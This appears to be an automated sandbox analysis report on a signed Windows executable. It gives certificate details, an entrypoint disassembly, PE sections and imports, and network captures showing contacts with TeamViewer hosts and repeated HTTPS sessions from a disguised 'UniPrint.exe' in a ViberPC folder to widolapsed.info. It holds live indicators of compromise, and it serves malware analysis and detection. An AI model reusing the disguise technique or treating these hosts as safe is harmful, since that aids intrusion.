                                                                                                      Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                      Error Number:0
                                                                                                      Not Before, Not After
                                                                                                      • 4/20/2021 5:00:00 PM 4/21/2022 4:59:59 PM
                                                                                                      Subject Chain
                                                                                                      • CN=Mapping OOO, O=Mapping OOO, L=Saint Petersburg, C=RU
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:B9C33DB697628B5EB88B4004D0D6900E
                                                                                                      Thumbprint SHA-1:D9F41380CE8E8E22E2EF7F558D6D17BB94AA28BE
                                                                                                      Thumbprint SHA-256:7B5C783B055EB8BA37480ED0E990E3A4631D38531485ECF3875FE213B2FB661D
                                                                                                      Serial:00A46F9D8784778BAA48167C48BBC56F30

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      sub esp, 00000180h
                                                                                                      push ebx
                                                                                                      push ebp
                                                                                                      push esi
                                                                                                      xor ebx, ebx
                                                                                                      push edi
                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                                      xor esi, esi
                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                      call dword ptr [00407030h]
                                                                                                      push 00008001h
                                                                                                      call dword ptr [004070B4h]
                                                                                                      push ebx
                                                                                                      call dword ptr [0040727Ch]
                                                                                                      push 00000008h
                                                                                                      mov dword ptr [00423F58h], eax
                                                                                                      call 00007FD2C0F3AECEh
                                                                                                      mov dword ptr [00423EA4h], eax
                                                                                                      push ebx
                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                      push 00000160h
                                                                                                      push eax
                                                                                                      push ebx
                                                                                                      push 0041F458h
                                                                                                      call dword ptr [00407158h]
                                                                                                      push 004091B8h
                                                                                                      push 004236A0h
                                                                                                      call 00007FD2C0F3AB81h
                                                                                                      call dword ptr [004070B0h]
                                                                                                      mov edi, 00429000h
                                                                                                      push eax
                                                                                                      push edi
                                                                                                      call 00007FD2C0F3AB6Fh
                                                                                                      push ebx
                                                                                                      call dword ptr [0040710Ch]
                                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                                      mov dword ptr [00423EA0h], eax
                                                                                                      mov eax, edi
                                                                                                      jne 00007FD2C0F382CCh
                                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                                      mov eax, 00429001h
                                                                                                      push dword ptr [esp+14h]
                                                                                                      push eax
                                                                                                      call 00007FD2C0F3A662h
                                                                                                      push eax
                                                                                                      call dword ptr [0040721Ch]
                                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                                      jmp 00007FD2C0F38325h
                                                                                                      cmp cl, 00000020h
                                                                                                      jne 00007FD2C0F382C8h
                                                                                                      inc eax
                                                                                                      cmp byte ptr [eax], 00000020h
                                                                                                      je 00007FD2C0F382BCh
                                                                                                      cmp byte ptr [eax], 00000022h
                                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000x13d8.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x1aefc00x1fe0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x70000x11900x1200False0.375217013889SysEx File -4.24219639454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .ndata0x240000x200000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x440000x13d80x1400False0.2705078125data3.94953591447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_ICON0x441f00x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                      RT_ICON0x447580x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                      RT_ICON0x44bc00x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                      RT_DIALOG0x44ce80x202dataEnglishUnited States
                                                                                                      RT_DIALOG0x44ef00xf8dataEnglishUnited States
                                                                                                      RT_DIALOG0x44fe80xeedataEnglishUnited States
                                                                                                      RT_GROUP_ICON0x450d80x30dataEnglishUnited States
                                                                                                      RT_MANIFEST0x451080x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.DLLCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                      USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 15, 2021 13:45:21.062195063 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.083190918 CEST8049746185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.083348036 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.084033966 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.104980946 CEST8049746185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.105108023 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.132512093 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.153398991 CEST8049746185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.153525114 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.155066967 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.176011086 CEST8049746185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.179953098 CEST8049746185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.181303024 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.182846069 CEST4974680192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.185116053 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.203911066 CEST8049746185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.206012964 CEST8049747185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.206460953 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.207201958 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.228383064 CEST8049747185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.228481054 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.230412960 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.251317978 CEST8049747185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.255006075 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.256596088 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.277640104 CEST8049747185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.277671099 CEST8049747185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.277726889 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.277755976 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.278570890 CEST4974780192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.281954050 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.299366951 CEST8049747185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.303028107 CEST8049748185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.306117058 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.307344913 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.328543901 CEST8049748185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.330037117 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.333331108 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.354281902 CEST8049748185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.354568958 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.356128931 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.381381035 CEST8049748185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.381586075 CEST8049748185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.382356882 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.382390022 CEST4974880192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.391493082 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.403625965 CEST8049748185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.412487030 CEST8049749185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.413767099 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.420521975 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.441457987 CEST8049749185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.441638947 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.443578959 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.465447903 CEST8049749185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.465599060 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.467319965 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.488471985 CEST8049749185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.488517046 CEST8049749185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.489243984 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.489878893 CEST4974980192.168.2.3185.188.32.22
                                                                                                      Sep 15, 2021 13:45:21.501794100 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.512207031 CEST8049749185.188.32.22192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.539535046 CEST8049750188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.539732933 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.541134119 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.574105978 CEST8049750188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.576061010 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.606089115 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.640276909 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.640408993 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.703310013 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.703459024 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.737312078 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.737845898 CEST8049750188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.737961054 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.743161917 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.777873039 CEST8049750188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.780050993 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.789140940 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.817682981 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.823175907 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.823558092 CEST8049750188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.823738098 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.826477051 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.865210056 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.865288973 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.865972042 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.897902966 CEST8049750188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.899944067 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.900090933 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.903194904 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.903299093 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.903404951 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.936281919 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.936321974 CEST8049751188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.936409950 CEST4975180192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:21.936599970 CEST8049750188.172.198.151192.168.2.3
                                                                                                      Sep 15, 2021 13:45:22.295255899 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:22.295335054 CEST4975080192.168.2.3188.172.198.151
                                                                                                      Sep 15, 2021 13:45:22.295448065 CEST4975080192.168.2.3188.172.198.151

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 15, 2021 13:45:07.951766014 CEST5754453192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:08.003196955 CEST53575448.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:13.472592115 CEST5598453192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:13.513010979 CEST53559848.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:18.363656998 CEST6418553192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:18.400454998 CEST53641858.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:20.264966965 CEST6511053192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:20.292700052 CEST53651108.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:21.015845060 CEST5836153192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:21.047782898 CEST53583618.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:23.053232908 CEST6349253192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:23.120400906 CEST53634928.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:31.937289000 CEST6083153192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:31.974164963 CEST53608318.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:40.243851900 CEST6010053192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:40.272849083 CEST53601008.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:45:51.775049925 CEST5319553192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:45:51.807053089 CEST53531958.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:46:26.363526106 CEST5014153192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:46:26.406059980 CEST53501418.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:46:28.347310066 CEST5302353192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:46:28.397870064 CEST53530238.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:31.724908113 CEST4956353192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:31.786111116 CEST53495638.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:34.873775959 CEST5135253192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:34.903615952 CEST53513528.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:37.876111031 CEST5934953192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:37.909280062 CEST53593498.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:41.422475100 CEST5708453192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:41.474040031 CEST53570848.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:44.051457882 CEST5882353192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:44.076170921 CEST53588238.8.8.8192.168.2.3
                                                                                                      Sep 15, 2021 13:47:47.365585089 CEST5756853192.168.2.38.8.8.8
                                                                                                      Sep 15, 2021 13:47:47.395354986 CEST53575688.8.8.8192.168.2.3

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      Sep 15, 2021 13:45:18.363656998 CEST192.168.2.38.8.8.80x4384Standard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:20.264966965 CEST192.168.2.38.8.8.80xf98dStandard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:21.015845060 CEST192.168.2.38.8.8.80x7997Standard query (0)master12.teamviewer.comA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:23.053232908 CEST192.168.2.38.8.8.80x1c63Standard query (0)widolapsed.infoA (IP address)IN (0x0001)

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      Sep 15, 2021 13:45:18.400454998 CEST8.8.8.8192.168.2.30x4384Name error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:20.292700052 CEST8.8.8.8192.168.2.30xf98dName error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:21.047782898 CEST8.8.8.8192.168.2.30x7997No error (0)master12.teamviewer.com185.188.32.22A (IP address)IN (0x0001)
                                                                                                      Sep 15, 2021 13:45:23.120400906 CEST8.8.8.8192.168.2.30x1c63No error (0)widolapsed.info45.153.241.148A (IP address)IN (0x0001)

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • widolapsed.info
                                                                                                      • master12.teamviewer.com
                                                                                                      • 188.172.198.151

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.34975245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.34975345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.34976345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.34976445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.34976545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.34977145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.34977845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.34978945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.34980345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.34980445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.34980545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      19192.168.2.34980645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.34975445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.34980745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.34980845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.34980945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.34981045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.34981145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.34981345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.34981745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.34981845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.34981945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.34982045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.34975545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.34982145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData


